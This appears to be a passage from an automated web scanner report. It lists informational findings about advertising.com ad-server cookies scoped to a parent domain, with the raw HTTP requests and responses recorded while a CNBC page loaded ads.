BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKDL!; ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NO!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894882.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:19:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 677
Date: Thu, 16 Jun 2011 19:19:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXActiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvG7Gt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD70AMyNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NeGo6Nl6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: 74200963=_4dfa5736,7160602726,768033^894882^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=qdk+NFJwHob0Fr6sIWwJoacjtKPCC0nBfJpwEg02FcMBdbdBHTwihXwxEwjmGcMBxGeBHTAQvawxEQW4FcMBLppBHTQghXwxEgN5FcMB6ijBHTAmhXwxEAY4FcMBdDmBHTA/yawxEAVZGcMBYimBHTA3WawxEQY4FcMBFGeBHTAxBawxEU1aGcMBbTeBHTQwBawxEYnXGcMBWGoBHTgQvawxEogmGcMBxmpBHTQRgawxE0soGcMB8mpBHHZAmZOiGoZj0jw+NX8btiGA8Mohl7a+AcsmGWuAEOpRCbLuBoKuGq/smJwokakwzClALRqRCXaxAMdPGXwrQQwdIash; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
F1=Bo2R63EBAAAABAAAAwAAMCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
BASE=x7Q9Vi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vI!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
ROLL=U6APFjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2O!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
74864635=_4dfa476a,7008281818,768033^924216^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247910801&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=vYk+NFJwHob0Fs6sIWwJoagjtKPCC0nRfJpwEg02FdMBdbdRHTwihX0xEwjmGdMBxGeRHTAQva0xEQW4FdMBLppRHTQghX0xEgN5FdMB6ijRHTAmhX0xEAY4FdMBdDmRHTA/ya0xEAVZGdMBYimRHTA3Wa0xEQY4FdMBFGeRHTAxBa0xEU1aGdMBbTeRHTQwBa0xEYnXGdMBWGoRHTgQva0xEogmGdMBxmpRHTQRga0xE0soGdMB8mpRHHZAmZOiGpZj0jw+NXActiGA8Moxl7a+AcsmGXuAEOphCbLuBoKuGr/smJwokaowzClALRqhCXaxAMdPGYwrQQwdIawh; F1=B8iR63EBAAAABAAAAsAAOCA; BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; ROLL=U6APEjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFP!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924216.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:11:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 607
Date: Thu, 16 Jun 2011 18:11:54 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=qdk+NFJwHob0Fr6sIWwJoacjtKPCC0nBfJpwEg02FcMBdbdBHTwihXwxEwjmGcMBxGeBHTAQvawxEQW4FcMBLppBHTQghXwxEgN5FcMB6ijBHTAmhXwxEAY4FcMBdDmBHTA/yawxEAVZGcMBYimBHTA3WawxEQY4FcMBFGeBHTAxBawxEU1aGcMBbTeBHTQwBawxEYnXGcMBWGoBHTgQvawxEogmGcMBxmpBHTQRgawxE0soGcMB8mpBHHZAmZOiGoZj0jw+NX8btiGA8Mohl7a+AcsmGWuAEOpRCbLuBoKuGq/smJwokakwzClALRqRCXaxAMdPGXwrQQwdIash; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: F1=Bo2R63EBAAAABAAAAwAAMCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: BASE=x7Q9Vi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vI!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: ROLL=U6APFjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2O!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: 74864635=_4dfa476a,7008281818,768033^924216^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=00007680
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
F1=BoRU63EBAAAABAAAAYBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
BASE=x7Q9fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINB!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
ROLL=U6APTjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0E!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
75388116=_4dfa511a,3065784557,768033^1029515^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308250393695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvB; F1=BoRU63EBAAAABAAAAUBA8BA; BASE=x7Q9ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKeJ!; ROLL=U6APSjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlO!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029515.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:53:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 621
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:53:14 GMT
Connection: close
Set-Cookie: C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: F1=BoRU63EBAAAABAAAAYBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: BASE=x7Q9fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINB!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: ROLL=U6APTjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0E!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: 75388116=_4dfa511a,3065784557,768033^1029515^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.2;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=4Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXobtiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
F1=BgPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
76474621=_4dfa44f8,0221667354,768033^1005068^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247287136&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=/Ok+NFJwHob0Fu6sIWwJoaojtKPCC0nxfJpwEg02FfMBdbdxHTwihX8xEwjmGfMBxGexHTAQva8xEQW4FfMBLppxHTQghX8xEgN5FfMB6ijxHTAmhX8xEAY4FfMBdDmxHTA/ya8xEAVZGfMBYimxHTA3Wa8xEQY4FfMBFGexHTAxBa8xEU1aGfMBbTexHTQwBa8xEYnXGfMBWGoxHTgQva8xEogmGfMBxmpxHTQRga8xE0soGfMB8mpxHHZAmZOiGrZj0jw+NXsbtiGA8MoRm7a+AcsmGZuAEOpBDbLuBoKuGt/smJwokawwzClALRqBDXaxAMdPGawrQQwdIa4h; F1=B87Q63EBAAAABAAAAgAASCA; BASE=x7Q9Si23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1A!; ROLL=U6APBjemptEW07uaB4l2FnxkoJDmaLF!; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1005068.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:01:28 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 600
Date: Thu, 16 Jun 2011 18:01:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=4Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXobtiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: F1=BgPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: 76474621=_4dfa44f8,0221667354,768033^1005068^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6751.4298.ADVERTISING.COM/B5433785;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=41k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
F1=BgXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
83985251=_4dfa4d78,7117460224,768033^951514^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

